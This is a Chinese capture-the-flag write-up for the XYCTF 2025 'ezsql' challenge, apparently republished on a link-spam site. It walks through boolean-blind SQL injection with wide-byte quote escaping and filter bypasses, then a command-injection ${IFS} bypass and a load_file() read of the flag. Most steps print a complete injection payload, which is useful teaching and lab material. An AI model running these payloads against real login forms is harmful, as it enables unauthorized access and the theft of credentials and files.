当前位置: 首页 > wzjs >正文

三亚防疫情最新通知优化大师官方网站

wzjs 2025/8/13 13:34:58
三亚防疫情最新通知,优化大师官方网站,哪些是网站建设,深圳靠谱网站建设公司2025 XYCTF ezsql 详细教程wp 解题技巧 空格绕过:使用%09#号绕过:使用%23单引号绕过:使用宽字节注入%dflimit 1,1绕过:使用limit%091%09offset%090这题我用的是布尔盲注,不知道师傅们有没有比这个更简单的办法因为是…

2025 XYCTF ezsql 详细教程wp

解题技巧

  • 空格绕过:使用%09
  • #号绕过:使用%23
  • 单引号绕过:使用宽字节注入%df'
  • limit 1,1绕过:使用limit%091%09offset%090
  • 这题我用的是布尔盲注,不知道师傅们有没有比这个更简单的办法
  • 因为是盲注,所以每条语句都需要爆破,我用的是burp的爆破,然后再导出ascii码查看值的办法
  • ,被过滤了,采用from for,爆破的时候payload放from后面那个值就行
  • limit%091%09offset%090爆破的payload放最后那个0那个位置

详细步骤

1. 数据库信息收集

1.1 查找数据库数量
username=1%df'%09or%09(select%09count(schema_name)%09from%09information_schema.schemata)=6%23&password=1

结果:共6个数据库

1.2 查找所有库名长度
username=1%df'%09or%09length(substr((select%09schema_name%09from%09information_schema.schemata%09limit%091%09offset%092)from(1)))=8%23&password=1

结果:18, 6, 5, 18, 4, 3

1.3 爆当前库长度
username=1%df'%09or%09length(database())=6%23&password=1

结果:库长为6

1.4 爆当前库名
username=1%df'%09or%09ascii(substr(database()from(1)for(1)))=90%23&password=1

结果:testdb (115 100 114 115 99 97)

所以这个时候就能猜出1.2的数据库应该是:
information_schema, testdb, mysql, performance_schema, sys

2. 表信息收集

2.1 爆表数量
username=1%df'%09or%09(select%09count(table_name)%09from%09information_schema.tables%09where%09table_schema="testdb")=2%23&password=1

结果:2个表

2.2 爆表名长度

第一个表:

username=1%df'%09or%09length(substr((select%09table_name%09from%09information_schema.tables%09where%09table_schema="testdb"%09limit%091%09offset%090)from(1)))=12%23&password=1

结果:12

第二个表:

username=1%df'%09or%09length(substr((select%09table_name%09from%09information_schema.tables%09where%09table_schema="testdb"%09limit%091%09offset%091)from(1)))=4%23&password=1

结果:4

2.3 爆表名

表一名称:

username=1%df'%09or%09ascii(substr((select%09table_name%09from%09information_schema.tables%09where%09table_schema="testdb"%09limit%091%09offset%090)from(1)for(1)))=90%23&password=1

结果:double_check (100 111 117 98 108 101 95 99 104 101 99 107)

表二名称:

username=1%df'%09or%09ascii(substr((select%09table_name%09from%09information_schema.tables%09where%09table_schema="testdb"%09limit%091%09offset%091)from(1)for(1)))=90%23&password=1

结果:user (117 115 101 114)

3. 字段信息收集

3.1 double_check表

字段数量:

username=1%df'%09or%09(select%09count(column_name)%09from%09information_schema.columns%09where%09table_name="double_check")=1%23&password=1

结果:1个字段

字段长度:

username=1%df'%09or%09length(substr((select%09column_name%09from%09information_schema.columns%09where%09table_name="double_check"%09limit%091%09offset%090)from(1)))=6%23&password=1

结果:6

字段名:

username=1%df'%09or%09ascii(substr((select%09column_name%09from%09information_schema.columns%09where%09table_name="double_check"%09limit%091%09offset%090)from(1)for(1)))=90%23&password=1

结果:secret (115 101 99 114 101 116)

3.2 user表

字段名长度(前49个字段):8, 8, 4, 4, 8, 11, 11, 11, 11, 11, 9, 11, 13, 12, 9, 10, 15, 10, 10, 12, 10, 16, 12, 15, 16, 16, 14, 19, 18, 16, 10, 12, 19, 8, 10, 11, 12, 13, 11, 15, 20, 6, 16, 7, 12, 18

爆前四个字段名:

  • username
  • password
  • Host
  • User
  • 太多了,爆不下去了,感觉username和password就够用了

4. 数据收集

4.1 获取secret值

secret字段值长度:

username=1%df'%09or%09length(substr((select%09secret%09from%09double_check%09limit%091%09offset%090)from(1)))=17%23&password=1

结果:17

secret值:

username=1%df'%09or%09ascii(substr((select%09secret%09from%09double_check%09limit%091%09offset%090)from(1)for(1)))=90%23&password=1

结果:dtfrtkcc0czkoua9S

感觉这个像个密钥,但是还不知道有啥用

4.2 获取用户信息

username值:

username=1%df'%09or%09ascii(substr((select%09username%09from%09user%09limit%091%09offset%090)from(1)for(1)))=90%23&password=1

结果:yudeyoushang

对应密码:

username=1%df'%09or%09ascii(substr((select%09password%09from%09user%09where%09username="yudeyoushang"%09limit%091%09offset%090)from(1)for(1)))=90%23&password=1

结果:zhonghengyisheng

5. 系统信息收集

当前系统用户:

username=1%df'%09or%09ascii(substr(user()from(1)for(1)))=90%23&password=1

结果:root@localhost

确定有root权限

获取Flag

使用获得的凭据:

  • 账号:yudeyoushang
  • 密码:zhonghengyisheng
  • 密钥:dtfrtkcc0czkoua9S

登录后发现存在一个rce,有空格过滤和一大堆的过滤(执行sleep${IFS}5,确实5秒才响应),${IFS}绕过空格过滤,但是命令执行没有回显。

尝试CEYE DNSLog进行数据外带,发现带不出来。

抓包发现注释中有/flag

但是直接读取flag失败了,猜测有什么限制

获取flag

  1. 执行命令移动flag绕过限制:
command=mv${IFS}/flag*${IFS}/flag.txt
  1. 读取flag.txt长度:
username=1%df'%09or%09length(load_file("/flag.txt"))=85%23&password=1

成功读取出来长度了

然后就是:

  1. 读取flag内容:
username=1%df'%09or%09ascii(substr(load_file("/flag.txt")from(1)for(1)))=1%23&password=1

88,89,67,84,70,123,99,51,49,56,55,53,53,101,45,102,56,55,57,45,52,97,54,102,45,98,101,101,101,45,51,51,55,55,55,52,49,53,97,57,53,55,125,10

flag值

XYCTF{c318755e-f879-4a6f-beee-33777415a957}

附上解ascii码的脚本

# 用来转ascii的
ascii_numbers = [90,100,101]
result = ''.join(chr(num) for num in ascii_numbers)
print(result)
http://www.dtcms.com/wzjs/330295.html

相关文章:

  • 网站功能与内容设计的步骤沧浪seo网站优化软件
  • 数字图书馆网站建设百度游戏排行榜风云榜
  • 北京网站制作人才怎么宣传网站
  • 深圳时事热点新闻seo关键词排名如何
  • 欧美网站建设怎样建网站
  • 南宁网站外包北京公司排名seo
  • 做网站手机外贸商城建站
  • 衢州网站建设哪家好百度关键词排名点击
  • 网站建设小结志鸿优化网官网
  • 福利博客wordpress网站seo优化方案项目策划书
  • 企业网站中文域名有必要续费吗网站模板免费下载
  • 全网营销型网站百度指数下载手机版
  • 江苏恒健建设集团有限公司网站百度seo和sem
  • 如何自己做公众号长春seo排名
  • 怎样做自己的摄影网站郑州网站优化渠道
  • 十个免费软件不收费seopc流量排名官网
  • 淘宝网网站设计分析优化软件seo排名
  • 济南高新区 网站建设想开个网站怎样开
  • 网站建设SEO优化哪家好网站自动收录
  • wordpress页面的templateseo关键词挖掘
  • 焦作网站建设策划杭州网站设计
  • 提升网站关键词排名创建免费网站
  • 交友网站免费建设新浪舆情通
  • 缝纫网站做洗衣机罩公司如何做网络推广营销
  • 咸宁市住房和城乡建设委员会网站网络营销总结
  • 包头做网站百度一下就知道官方网站
  • 公司网站是否有必要销售产品高端网站建设哪个好
  • 做网站需要注册公司吗广告联盟
  • 学校网站建设方案论文淘宝关键词怎么选取
  • 网站建设报价表格小说关键词搜索器